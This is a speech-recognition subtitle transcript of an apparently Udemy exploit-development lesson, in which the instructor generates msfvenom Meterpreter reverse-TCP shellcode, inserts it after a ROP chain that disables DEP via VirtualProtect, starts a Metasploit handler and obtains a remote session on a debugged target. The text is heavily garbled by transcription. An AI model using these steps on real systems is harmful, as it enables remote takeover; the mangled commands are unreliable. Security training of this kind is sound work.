1
00:00:00,060 --> 00:00:00,720
Hello again.

2
00:00:00,720 --> 00:00:08,730
Welcome back to Rob chatting and we finally re-enable that non executable bit to be shut down.

3
00:00:08,940 --> 00:00:17,220
We disable DEP in our previous section as you can see right here we bypassed all the knobs with enough

4
00:00:17,220 --> 00:00:19,560
for executing and we call it virtual protect.

5
00:00:20,340 --> 00:00:25,020
So what we're going to do now is generate our shell code to generate our shell.

6
00:00:25,710 --> 00:00:32,729
So we want to use command MSF venom dash p windows mature critter reverse TCP our host my attacking

7
00:00:32,729 --> 00:00:40,470
machine 4444 eliminate just an all by access function equal thread format python.

8
00:00:58,960 --> 00:01:00,700
So let's copy all of this.

9
00:01:06,530 --> 00:01:06,790
Now.

10
00:01:06,800 --> 00:01:07,610
No new.

11
00:01:08,300 --> 00:01:10,220
Well, actually, let's give it the variable.

12
00:01:10,550 --> 00:01:11,070
Shoko.

13
00:01:11,390 --> 00:01:11,860
Sorry.

14
00:01:12,800 --> 00:01:14,030
Let's just regenerate this again.

15
00:01:25,490 --> 00:01:27,140
So just copy the show code.

16
00:01:27,860 --> 00:01:29,030
Now new

17
00:01:31,550 --> 00:01:38,720
insert the show clip right here and then we're going to modify our payload again.

18
00:01:39,650 --> 00:01:42,110
So let's just go back to my previous notes.

19
00:01:47,830 --> 00:01:49,450
And we're going to change.

20
00:01:50,460 --> 00:01:51,040
Let's see.

21
00:01:52,880 --> 00:02:02,660
I'm going to change the padding string from the subtract one, which is the break right here replaced

22
00:02:02,700 --> 00:02:03,660
after a shoutout.

23
00:02:03,900 --> 00:02:12,570
So if the length of our show goes a minus or backspace on one line of show code and for the break,

24
00:02:13,290 --> 00:02:14,850
we're going to enter show code right here.

25
00:02:20,990 --> 00:02:23,180
I hope I'm not going too fast for everybody.

26
00:02:26,870 --> 00:02:33,680
If I am going too fast, please review the videos or just please add a question to on Udemy on the discussion.

27
00:02:35,840 --> 00:02:37,580
And now let's start.

28
00:02:39,200 --> 00:02:40,190
MSF Council.

29
00:02:57,270 --> 00:02:59,220
Years Miles high handler.

30
00:03:03,000 --> 00:03:07,970
Its payload windows mature for reverse TCP.

31
00:03:10,820 --> 00:03:18,610
Site Host 0.0.00 as a session of Show Missing

32
00:03:21,790 --> 00:03:26,020
Run Dash J and let's restart.

33
00:03:26,410 --> 00:03:27,550
You mean debugger again.

34
00:03:27,760 --> 00:03:29,770
So click on debug restart.

35
00:03:30,520 --> 00:03:31,090
Yes.

36
00:03:32,720 --> 00:03:33,440
Press play.

37
00:03:37,930 --> 00:03:38,680
And Python.

38
00:03:39,700 --> 00:03:41,670
Python knew that pi.

39
00:03:43,420 --> 00:03:44,430
Press play again.

40
00:03:48,060 --> 00:03:50,670
And we cut we created a mature procession.

41
00:03:53,940 --> 00:03:54,900
Keep pressing play.

42
00:03:56,940 --> 00:03:59,070
An execution will drive her to the show.

43
00:04:03,640 --> 00:04:06,250
Sessions such as this one.

44
00:04:06,850 --> 00:04:07,240
How?

45
00:04:10,230 --> 00:04:13,560
Let's see if we can run a command system.

46
00:04:17,230 --> 00:04:17,890
Cashed up.

47
00:04:20,769 --> 00:04:21,370
Excellent.

48
00:04:21,700 --> 00:04:23,590
So we just covered rock chaining.

49
00:04:24,370 --> 00:04:27,220
This is a very, very simplified version of rock chaining.

50
00:04:27,520 --> 00:04:33,430
I actually prefer that you guys understand the intricate details of how rock chaining works, and there

51
00:04:33,430 --> 00:04:36,250
are plenty of resources that I will show you later.

52
00:04:37,150 --> 00:04:45,790
Links on how rock chaining actually works because this is basically easy mode rock chaining disabling

53
00:04:45,790 --> 00:04:55,060
DEP by using Mona's rock module and before Mona, before MSF rock, which is another Metasploit tool

54
00:04:55,060 --> 00:05:02,650
that was used to create rope chains, we had to manually craft our rock chains and it was basically

55
00:05:02,650 --> 00:05:09,760
like finding it was like navigating one of those paper mazes that we had when we were in elementary

56
00:05:09,760 --> 00:05:10,630
school for pencil.

57
00:05:11,140 --> 00:05:21,580
We had to call specific gadgets in a way where it would take us and align our stack pointer to where

58
00:05:21,580 --> 00:05:24,580
we want to call virtual protect to shut down DEP.

59
00:05:25,210 --> 00:05:27,370
So thank you for your time.

60
00:05:27,820 --> 00:05:32,020
This is the end of the rope chaining module and please see the additional resources I will be adding

61
00:05:32,020 --> 00:05:32,860
on rock chaining.